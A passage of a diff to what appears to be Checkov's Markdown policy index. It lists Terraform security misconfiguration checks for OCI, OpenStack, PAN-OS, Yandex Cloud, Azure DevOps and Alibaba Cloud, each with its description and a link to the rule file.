[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 2025 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 2026 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | -| 2027 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | -| 2028 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | -| 2029 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | -| 2030 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | -| 2031 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | -| 2032 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 2033 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 2034 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 2035 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 2036 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | -| 2037 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | -| 2038 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | -| 2039 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | -| 2040 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | -| 2041 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 2042 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 2043 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 2044 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 2045 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 2046 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 2047 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 2048 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 2049 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 2050 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 2051 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 2052 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 2053 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 2054 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 2055 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 2056 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 2057 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 2058 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 2059 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 2060 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 2061 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2062 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2063 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2064 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 2065 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 2066 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | -| 2067 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2068 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2069 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2070 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2071 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2072 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2073 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2074 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2075 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2076 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | -| 2077 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | -| 2078 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | -| 2079 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | -| 2080 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | -| 2081 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | -| 2082 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | -| 2083 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | -| 2084 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | -| 2085 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | -| 2086 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2087 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2088 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2089 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2090 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2091 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2092 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2093 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2094 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 2095 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 2096 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | -| 2097 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | -| 2098 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | -| 2099 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | -| 2100 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | -| 2101 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | -| 2102 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | -| 2103 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 2104 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 2105 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | -| 2106 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 2107 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 2108 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2109 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2110 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2111 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2112 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2113 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | +| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | +| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | +| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | +| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | +| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | +| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | +| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | +| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | +| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | +| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | +| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | +| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | +| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | +| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | +| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | 